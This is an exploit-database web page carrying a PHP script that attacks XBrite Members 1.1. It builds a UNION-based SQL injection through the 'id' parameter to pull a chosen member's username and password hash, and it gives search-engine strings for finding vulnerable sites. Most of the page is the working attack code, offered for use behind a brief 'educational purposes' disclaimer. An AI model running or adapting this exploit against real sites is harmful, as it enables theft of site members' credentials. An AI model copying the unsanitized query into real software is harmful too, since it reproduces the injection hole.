0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

XBrite Members <= 1.1 (id) Remote SQL Injection Exploit

Author

snatcher

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-344

Category

web applications

Date add

08-04-2006

Platform

unsorted

=======================================================
XBrite Members <= 1.1 (id) Remote SQL Injection Exploit
=======================================================





<?php /*
 |=================================================================================================|
 |       _______..__   __.      ___      .___________.  ______  __    __   _______ .______         |
 |      /       ||  \ |  |     /   \     |           | /      ||  |  |  | |   ____||   _  \        |
 |     |   (----`|   \|  |    /  ^  \    `---|  |----`|  ,----'|  |__|  | |  |__   |  |_)  |       |
 |      \   \    |  . `  |   /  /_\  \       |  |     |  |     |   __   | |   __|  |      /        |
 |  .----)   |   |  |\   |  /  _____  \      |  |     |  `----.|  |  |  | |  |____ |  |\  \----.   |
 |  |_______/    |__| \__| /__/     \__\     |__|      \______||__|  |__| |_______|| _| `._____|   |
 |                                                                                                 |
 |=================================================================================================|


      exploit: XBrite Members <= 1.1 remote sql injection vulnerability
      release: 2006-04-09
       author: snatcher [snatcher at gmx.ch]
      country: switzerland  |+|
	  
  application: XBrite Members <= 1.1
  description: a php / mysql based member script

  description: if magic_quotes_gpc is Off, you can get each password (md5 hash) with a simple sql injection
  fingerprint: google -> "Powered By XBrite Members" -> 2800
               msn -> "Powered By XBrite Members" ->  581
   conditions: php.ini -> magic_quotes_gpc = Off
       greets: all security guys and coders over the world, honkey :>, ..
 terms of use: this exploit is just for educational purposes, do not use it for illegal acts.


---------------------------- members.php - line 197 -------------------------------------
$query = @mysql_query ("select * from oz_members where id='".$_GET['id']."'");
-----------------------------------------------------------------------------------------

because magic_quotes_gpc is off, you can break out of the singel quotes and insert malicious sql code,
i.e. with a union operator.


*/

/*********************** CONFIGURATION ****************************/

$PATH_TO_FILE  = 'http://yourhost.com/member.php';                 // in example: http://yourhost.com/member.php
$USER_ID       = 1;                                                // from which user id do you want the password? default: 1
$GET_VARS      = '?action=members&act=show&id=';                   // do not change
$SQL_INJECTION = '0\' union select 1,1,1,1,1,1,1,1,1,real_name'.   // do not change
                 ',name,pw,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,'.
				 '1,1,1,1,1,1,1,1,1,1,1,1 from oz_members where '.
				 'id = '.$USER_ID.' /*';


/**************************** MAIN ********************************/

$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); 
foreach ($file_array as $now)                               
	$html_content .= $now;

$html_content = str_castrate($html_content);

preg_match_all("!Alter:</b></td><tdwidth=\"50%\">(.*?)</td>!",$html_content,$username); /* gets username */
preg_match_all("!Herkunft:</b></td><tdwidth=\"50%\">(.*?)</td>!",$html_content,$password); /* gets password */

if ($username[1][0] && $password[1][0] && $username[1][0] <> 'keineAngabe') {
	echo 'username: <b>'.$username[1][0].'</b><br>';
	echo 'password: <b>'.$password[1][0].'</b>';
}else {
	echo 'exploit failed! <br>magic_quotes_gpc = Off ?';
}
echo '<br><br><br><br><br>
======================================================================<br>
exploit: XBrite Members <= 1.1 remote sql injection vulnerability<br>
release: 2006-04-09<br>
author: snatcher [snatcher at gmx.ch]<br>
======================================================================';

function str_castrate($string) {
	$string = str_replace("\n", '', $string);
	$string = str_replace("\r", '', $string);
	$string = str_replace(" ", '', $string);
	return $string;
}
?>



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

XBrite Members <= 1.1 (id) Remote SQL Injection Exploit

Report Error

Report Error